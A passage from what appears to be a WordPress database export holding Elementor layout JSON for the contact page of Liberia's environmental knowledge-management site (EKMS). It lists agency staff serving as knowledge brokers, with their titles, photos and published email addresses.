Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23347,3391,'_elementor_edit_mode','builder'),(23348,3391,'_elementor_template_type','wp-page'),(23349,3391,'_elementor_version','3.0.16'),(23350,3391,'_wp_page_template','default'),(23351,3391,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a 